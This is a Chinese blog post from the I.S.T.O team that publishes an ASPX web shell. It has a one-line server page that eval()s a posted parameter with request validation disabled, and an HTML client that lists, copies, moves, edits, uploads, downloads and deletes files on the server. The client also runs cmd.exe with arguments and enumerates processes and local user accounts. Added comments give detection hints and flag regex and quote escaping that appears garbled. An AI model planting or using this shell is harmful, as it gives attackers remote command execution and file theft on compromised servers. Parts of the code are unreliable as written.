
ASPX-C/S-SHELL 1.0


 

Author : kj021320

Team : I.S.T.O 

信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)

服务器端 一句话为

<%-- Server side of the shell as posted: a JScript.NET page that hands the request item
     named "z" to eval() in "unsafe" mode and writes the result into the response.
     validateRequest="false" switches off ASP.NET request validation so the posted script
     text is not rejected. For defenders, the combination of validateRequest="false",
     Language="Jscript" and eval(Request...) in a single .aspx line is the signature to
     look for in file scans. --%>
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%>

这个一句话不用说了!我之前已经发表文章讲解过!

client端HTML页面代码如下

<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
<title>I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320</title>
<style type="text/css">
 body,td{font-size: 12px;}
<!-- expression() is a legacy Internet Explorer-only CSS feature; the page targets that browser era. -->
table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
 input,select{font-size:12px;}
 body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
 td{white-space:nowrap;}
 a{color:black;text-decoration:none;}
</style>
<!--
Author: kj021320
Team : I.S.T.O
Description:

file/folder  copy,move and view
file  down , edit , delete , upload and run
server config and user information

U can extend the ASPX-C/S-SHELL function and use setCmdText(the js function) to commit the command.
Every button in the form below only stages a script string in the hidden "Command" input;
the form post then delivers that string to the server page named in the URL field.
-->
<script language="javascript">
 // Stage a server-side file copy: the command text declares s and t and calls
 // System.IO.File.Copy(s,t). It is only placed in the hidden "Command" input
 // (see setCmdText); the form submit delivers it.
 // NOTE(review): the regex literal and the replacement string "////" look garbled by
 // page extraction; the escaping they were meant to apply cannot be confirmed here.
 function copyFile(s,t){
  s=s.replace(////g,"////");
  t=t.replace(////g,"////");
  setCmdText('var s="'+s+'",t="'+t+'";System.IO.File.Copy(s,t);');
 }
 // Stage a process launch: the command text creates a System.Diagnostics.Process with
 // UseShellExecute=false and RedirectStandardOutput=true, sets FileName=s and
 // Arguments=a, starts it, reads stdout to end and returns it wrapped in <pre>
 // (the closing tag is also written as "<pre>", apparently a typo).
 // For detection: the child process is presumably started by the web server worker
 // process that runs the page — an unusual parent for a command interpreter.
 // NOTE(review): the regex/replacement "////" appears garbled by page extraction.
 function runFile(s,a){
  s=s.replace(////g,"////");
  a=a.replace(////g,"////");
  setCmdText('var s="'+s+'",a="'+a+'";var p=new System.Diagnostics.Process();p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.FileName=s;p.StartInfo.Arguments=a;p.Start();var o=p.StandardOutput.ReadToEnd();"<pre>"+o+"<pre>"');
 }
 // Stage a file edit in two steps. The command text reads f with a StreamReader and
 // returns an HTML form: the HtmlEncode'd content in a textarea, the path in "fname",
 // and a hidden input named after the current KEY value whose value is a second script
 // (StreamWriter writing Request.Item["t"] to Request.Item["fname"]). Submitting that
 // returned form therefore writes the edited text back on the server.
 // NOTE(review): the many "//"" and "/'" sequences look like extraction garbling of
 // escaped quotes; the exact quoting cannot be confirmed from this copy.
 function editFile(f){
  f=f.replace(////g,"////");
  var code='var stream:System.IO.TextReader,filename,os="",thePath="'+f+'",code;stream=new System.IO.StreamReader(thePath);os=stream.ReadToEnd();os="<form method=post><input name=fname value="+thePath+"><input type=submit name=s value=save><textarea name=t rows=30 style=width:100%;>"+Server.HtmlEncode(os)+"</textarea><input name=//"'+address.KEY.value+'//" type=hidden value=/'var stream:System.IO.TextWriter;stream=new  System.IO.StreamWriter(Request.Item[//"fname//"]);stream.Write(Request.Item[//"t//"]);stream.Close();stream=null;Response.Write(//"OK//")/'></form>";stream.Close();stream=null;os;';
  setCmdText(code);
 }
 // Stage a file upload: the command text saves the multipart part named "myfile"
 // (the <input type=file name=myfile> in the form) to path f via Request.Files.
 // NOTE(review): the regex/replacement "////" appears garbled by page extraction.
 function upfile(f){
  f=f.replace(////g,"////");
  setCmdText('var files=Request.Files;if(files.Count!=0)files.Get("myfile").SaveAs("'+f+'");');
 }
 // Stage a file download: the command text clears the response, opens f as a
 // FileStream, derives the file name from the last path separator, sends it as
 // Content-Disposition: attachment with Content-Length and
 // application/octet-stream, copies the stream in 1024-byte chunks to
 // Response.OutputStream, then flushes and ends the response.
 // For detection: an octet-stream attachment served by a page that is otherwise
 // text/html is a useful anomaly in web logs.
 // NOTE(review): the "////" sequences appear garbled by page extraction.
 function downFile(f){
  f=f.replace(////g,"////");
  setCmdText('var stream,filename,bs,os,thePath="'+f+'";Response.Clear();bs=new byte[1024];stream=new System.IO.FileStream(thePath,System.IO.FileMode.Open);filename=thePath.substr(thePath.lastIndexOf("////")+1);Response.AddHeader("Content-Disposition","attachment; filename="+Server.UrlEncode(filename).replace("+"," "));Response.AddHeader("Content-Length",stream.Length);Response.Charset="UTF-8";Response.ContentType="application/octet-stream";os=Response.OutputStream;var i=stream.Read(bs,0,bs.Length);while(i>0){os.Write(bs,0,i);i=stream.Read(bs,0,bs.Length);}os=null;Response.Flush();stream.Close();stream=null;Response.End();');
 }
 function ProcessInfo(){
  setCmdText('var o;var proc=System.Diagnostics.Process.GetCurrentProcess();o="<h4>CurrentProcessInfor:</h4>";o+=getProcessInfo(proc);var ptc=proc.Threads;for(var p in ptc){o+="<br>"+getProcessThreadInfo(p);}o+="<h4>OtherProcessInfor:</h4>";var  ps=System.Diagnostics.Process.GetProcesses(proc.MachineName);for(var p in ps){o+="<br>"+getProcessInfo(ps[p]);}function getProcessThreadInfo(pt:System.Diagnostics.ProcessThread):String{var o="<br>Id:"+pt.Id; o+="<br>BasePriority:"+pt.BasePriority; o+="<br>CurrentPriority:"+pt.CurrentPriority;o+="<br>Site:"+pt.Site;o+="<br>StartAddress:"+pt.StartAddress;o+="<br>ThreadState:"+pt.ThreadState;return o;}function getProcessInfo(proc:System.Diagnostics.Process):String{var o="<br>ProcessName:"+proc.ProcessName;o+="<br>BasePriority:"+proc.BasePriority;o+="<br>MachineName:"+proc.MachineName;o+="<br>MainWindowTitle:"+proc.MainWindowTitle;try{o+="<br>MaxWorkingSet:"+proc.MaxWorkingSet;o+="<br>MinWorkingSet:"+proc.MinWorkingSet;}catch(e){}o+="<br>NonpagedSystemMemorySize:"+proc.NonpagedSystemMemorySize;o+="<br>PagedMemorySize:"+proc.PagedMemorySize;o+="<br>PagedSystemMemorySize:"+proc.PagedSystemMemorySize;o+="<br>PeakPagedMemorySize:"+proc.PeakPagedMemorySize;o+="<br>PeakVirtualMemorySize:"+proc.PeakVirtualMemorySize;o+="<br>PeakWorkingSet:"+proc.PeakWorkingSet;o+="<br>PrivateMemorySize:"+proc.PrivateMemorySize;o+="<br>VirtualMemorySize:"+proc.VirtualMemorySize;o+="<br>WorkingSet:"+proc.WorkingSet;return o;}');
 }
 function userInfo(){
  setCmdText('function getUserInfo(strUser:String):String{var User,Flags,o="";try{ User=GetObject("WinNT://./"+strUser+",user");with(User){o+="<br>Description:"+User.Description+"<br>";o+="PasswordExpired:"+Get("PasswordExpired")+"<br>";Flags=Get("UserFlags");o+="passover:"+(Flags==65536)+"<br>";o+="CannotChangPass:"+(Flags==64)+"<br>";o+="GlobalAccount:"+(Flags==256)+"<br>";o+="PasswordMinimumLength:"+PasswordMinimumLength+"<br>";o+="PasswordRequired:"+PasswordRequired+"<br>";o+="AccountDisabled:"+AccountDisabled+"<br>";o+="IsAccountLocked:"+IsAccountLocked+"<br>";o+="Profile:"+Profile+"<br>";o+="LoginScript:"+LoginScript+"<br>";o+="HomeDirectory:"+HomeDirectory+"<br>";o+="HomeDirDrive:"+Get("HomeDirDrive")+"<br>";o+="AccountExpirationDate:"+AccountExpirationDate+"<br>";o+="BadLoginCount:"+BadLoginCount+"<br>";o+="LastLogin:"+LastLogin+"<br>";o+="LastLogoff:"+LastLogoff+"<br>";}}catch(e){}return o;}function Userinfo():String{var User,Group,Computer,o="";Computer=GetObject("WinNT://.");Computer.Filter=new Array("User");o+="User:<hr>";for(User in Computer){o+="<li>"+User.Name+"</li>";o+=getUserInfo(User.Name);o+="<hr>";}o+="UserGroup:<hr>";Computer.Filter=new Array("Group");for(Group in Computer){o+="<li>"+Group.Name+"</li>"+Group.Description+"<hr>";}return o;}Userinfo();');
 }
 // Stage a file deletion: the command text calls System.IO.File.Delete(s).
 // No existence check is made; a missing file is left to the server-side call.
 // NOTE(review): the regex/replacement "////" appears garbled by page extraction.
 function delFile(s){
  s=s.replace(////g,"////");
  setCmdText('var s="'+s+'";System.IO.File.Delete(s);');
 }
 // Stage a move/rename: the command text uses File.Move when s is an existing file
 // and Directory.Move when s is an existing directory (both checks are evaluated).
 // NOTE(review): the regex/replacement "////" appears garbled by page extraction.
 function moveFile(s,t){
  s=s.replace(////g,"////");
  t=t.replace(////g,"////");
  setCmdText('var s="'+s+'",t="'+t+'";if(System.IO.File.Exists(s))System.IO.File.Move(s,t);if(System.IO.Directory.Exists(s))System.IO.Directory.Move(s,t);');
 }
 function Info(){
  setCmdText('var o="";o+="<br>MachineName:"+Environment.MachineName;o+="<br>UserDomainName:"+Environment.UserDomainName;o+="<br>UserName:"+Environment.UserName;o+="<br>OS:"+Environment.OSVersion;o+="<br>ADDRESS:"+Request.ServerVariables("LOCAL_ADDR");o;');
 }
 // Wire the form to the server page: the form action becomes the URL field, the
 // hidden command input is renamed to the KEY field (so it matches the request item
 // the server page evaluates), and an initial Server.MapPath("./") command is staged.
 // Top is the "address" form, assigned by the trailing script after </html>.
 // NOTE(review): the /" sequences look like extraction garbling of escaped quotes.
 function check(){
  Top.action=Top.URL.value;
  setCmdName(Top.KEY.value);
  setCmdText("Server.MapPath(/"./")");
 }
 // Stage a directory listing: if p exists, the command text emits its subdirectories
 // (Directory.GetDirectories) under "DIR:" and its files (Directory.GetFiles) under
 // "FILE:"; otherwise only the "DIR:" heading is returned.
 // NOTE(review): the regex/replacement "////" appears garbled by page extraction.
 function listFolder(p){
  p=p.replace(////g,"////");
  setCmdText('var p="'+p+'",output="";output+="DIR:<br>";if(System.IO.Directory.Exists(p)){var ds=System.IO.Directory.GetDirectories(p);for(var i in ds)output+=ds[i]+"<br>";output+="FILE:<br>";var fs=System.IO.Directory.GetFiles(p);for(var i in fs)output+=fs[i]+"<br>";}output;');
 }
 function setCmdName(n){
  getCmd().name=n;
 }
 function setCmdText(str){
  getCmd().value=str;
 }
 function getCmd(){
  return document.getElementById("Command");
 }
</script>
</head>
<body>
 <!-- Single multipart form "address" posting into the "Display" iframe. The action is
      set by check() from the URL field; the hidden input id=Command (name "cmd" until
      setCmdName renames it to the KEY value) carries the staged script. Each submit
      button's onclick stages a command, then the form post delivers it. The RunFile
      row defaults to c:/windows/system32/cmd.exe; the iframe initially shows the
      author's blog. -->
 <table width=100% height=100% border=0 bgcolor=menu>
 <tr><td height=30 colspan=2>
 <table width=100% height=25 border=0>
 <form name=address method=post target=Display enctype="multipart/form-data" >
 <tr><td width=60 align=center>SHELL:</td><td style=width:80%>
 <input name=URL style=width:90% value="http://127.0.0.1/kj021320.aspx"> KEY:
 <input name=KEY style=width:5%>
 <input name=cmd type=hidden id=Command>
 </td><td align=center><input name=Submit onClick="check();" type=submit value=link>
 </td></tr>
 <tr align=center><td>path:</td><td><input name=path style=width:100%></td><td><input name=view type=submit value=view onclick="listFolder(path.value);"></td></tr>

 <tr align=center><td>Opt:</td><td>source:<input name=sname style=width:40%>target:<input name=tname  style=width:40%></td><td> <input type=submit name=cp value=copy onclick="copyFile(sname.value,tname.value);"><input type=submit name=mv value=move onclick="moveFile(sname.value,tname.value);"></td></tr>

 <tr align=center><td>FileOpt:</td><td>Filepath:<input name=fp style=width:80%></td><td><input type=submit name=down value=down onclick="downFile(fp.value);"><input type=submit name=edit onclick="editFile(fp.value);" value=edit><input type=submit name=del value=del onclick="delFile(fp.value);"></td></tr>
 
 <tr align=center><td>RunFile:</td><td>Filepath:<input name=rfp value="c:/windows/system32/cmd.exe" style=width:40%>Args:<input name=args style=width:40%></td><td><input type=submit name=run value=run onclick="runFile(rfp.value,args.value);"></td></tr>

 <tr align=center><td>Info:</td><td><input type=submit name=req value=Info onclick="Info();"><input type=submit name=proc value=Process onclick="ProcessInfo();"><input type=submit name=userInf value=userInfo onclick="userInfo();"></td><td></td></tr>

 <tr align=center><td>upfile:</td><td><input type=file name=myfile style=width:40%>save:<input type=text name=safile style=width:40%></td><td><input type=submit name=up value=upfile onclick="upfile(safile.value);"></td></tr>
 </form></table></td></tr><tr><td>
 <iframe name=Display width=100% src=http://blog.csdn.net/I_S_T_O/ height=100% scrolling=yes></iframe>
 </td></tr></table>
</body></html>
<script>
 // Runs after the markup is parsed: cache the "address" form of the top window.
 // check() reads its URL and KEY fields and sets its action.
 var Top=top.address;
</script>

基本上平时ASPXSHELL的文件操作功能我都加入进去了 注册表跟数据库操作的没写!多加了个进程浏览 用户组浏览 具体更多的功能迟点再更新吧~具体更新信息请关注I.S.T.O 开源项目区http://blog.csdn.net/I_S_T_O/category/325894.aspx  没有实现的功能,有兴趣的朋友可以接力 :)

转载请注明出处
